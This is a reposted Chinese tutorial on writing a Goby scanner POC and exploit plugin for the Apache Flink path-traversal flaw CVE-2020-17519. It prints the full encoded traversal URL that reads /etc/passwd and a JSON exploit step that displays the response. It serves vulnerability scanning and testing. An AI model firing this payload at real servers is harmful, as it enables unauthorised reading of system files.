goby自定義POC+EXP編寫


這里我們以最近爆出來的Apache Flink CVE-2020-17519來進行編寫測試。

下面我來說下其實goby poc+exp很簡單。

POC寫法

漏洞名稱+查詢規則 規則搞不懂參考旁邊問號。

然后在測試里面

測試URL:/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

填寫,請求方法,測試漏洞URL,昨們這里是get請求校驗,所以就填寫請求方法 漏洞url就行。

group里面的正則

code = 響應 200

body contains 返回一個值 我這里就設置默認為/bin/bash 如果是Linux主機存在漏洞肯定會返回/bin/bash,填寫好后。

找了個地址驗證下,發現存在漏洞到這里我們poc已經寫好了,然后我們提交。

去goby目錄找到我們剛剛寫好的插件,打開他。

 

 

 在Scanstep上面添加語句:

      "ExpParams": [
       {
        "name": "查看",
        "type": "input",
        "value": "點擊驗證",
        "show": ""
        }
      ],

然后將Scanstep部分復制下來,然后添加output|lastbody把響應的body展示出來。

      "Exploitsteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd",
                        "follow_redirect": false,
                        "header": {},
                        "data_type": "text",
                        "data": ""
                  },
                 "SetVariable": [
                  "output|lastbody"
                 ]
            }
      ],

 

 

 

然后保存就行了。我們在去測試。好了這里已經完成了,大佬勿噴。。謝謝。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM